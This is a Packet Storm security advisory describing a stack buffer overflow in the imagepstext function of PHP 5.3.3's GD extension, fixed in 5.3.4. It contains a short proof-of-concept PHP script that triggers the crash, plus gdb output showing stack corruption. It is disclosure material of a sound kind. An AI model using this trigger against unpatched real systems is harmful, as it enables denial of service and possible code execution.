what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

PHP 5.3.3 GD Stack Buffer Overflow

PHP 5.3.3 GD Stack Buffer Overflow
Posted Dec 10, 2010
Authored by Martin Barbella

PHP 5.3.3 suffers from a GD extension imagepstext stack buffer overflow vulnerability.

tags | exploit, overflow, php
SHA-256 | dd471798a94019e55c17a159a67a7b668dc2b65a5268afe78a02db0606ae93bc

PHP 5.3.3 GD Stack Buffer Overflow

Change Mirror Download
Description:

Prior to version 5.3.4, PHP's GD extension did not properly validate
the number of anti-aliasing steps passed to the function imagepstext.
The value of this parameter is expected to be either 4 or 16. To
accommodate this, an array of 16 integers, aa, is located on the
stack. Before the number of steps is validated, it is used to populate
the array. This results in a stack-based buffer overflow.

Proof of concept:

<?php
$img = imagecreatetruecolor(1, 1); //Arbitrary
$fnt = imagepsloadfont("somefont.pfb"); //Arbitrary
//The final parameter is the number of anti-aliasing steps
imagepstext($img, "Testing", $fnt, 0xAAAAAA, 0xAAAAAA, 0xAAAAAA,
0xAAAAAA, 0xAAAAAA, 0, 0, 0.0, 99999);
?>

Result in php 5.3.3 (with gdb):

sh-4.1$ php -v
PHP 5.3.3 (cli) (built: Jul 22 2010 15:37:02)
Copyright (c) 1997-2010 The PHP Group
Zend Engine v2.3.0, Copyright (c) 1998-2010 Zend Technologies
sh-4.1$ gdb php
<trimmed>
(gdb) run imagepstext_poc.php
Starting program: /usr/bin/php imagepstext_poc.php
[Thread debugging using libthread_db enabled]

Program received signal SIGSEGV, Segmentation fault.
0x004dcca7 in zif_imagepstext (ht=11184810, return_value=0xaaaaaa,
return_value_ptr=0xaaaaaa, this_ptr=0xaaaaaa, return_value_used=11184810)
at /usr/src/debug/php-5.3.3/ext/gd/gd.c:4257
4257 aa[i] = gdImageColorResolveAlpha(bg_img, rd, gr, bl, al);
Missing separate debuginfos, use: <trimmed>
(gdb) bt
#0 0x004dcca7 in zif_imagepstext (ht=11184810, return_value=0xaaaaaa,
return_value_ptr=0xaaaaaa, this_ptr=0xaaaaaa, return_value_used=11184810)
at /usr/src/debug/php-5.3.3/ext/gd/gd.c:4257
#1 0x00aaaaaa in ?? ()
#2 0x00aaaaaa in ?? ()
#3 0x00aaaaaa in ?? ()
#4 0x00aaaaaa in ?? ()
#5 0x00aaaaaa in ?? ()
<etc>

Result in php 5.3.4:

$ ./php-5.3.4 -v
PHP 5.3.4 (cli) (built: Dec 10 2010 10:26:40)
Copyright (c) 1997-2010 The PHP Group
Zend Engine v2.3.0, Copyright (c) 1998-2010 Zend Technologies
$ ./php-5.3.4 imagepstext_poc.php

Warning: imagepstext(): AA steps must be 4 or 16 in
/home/.../imagepstext_poc.php on line 4

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close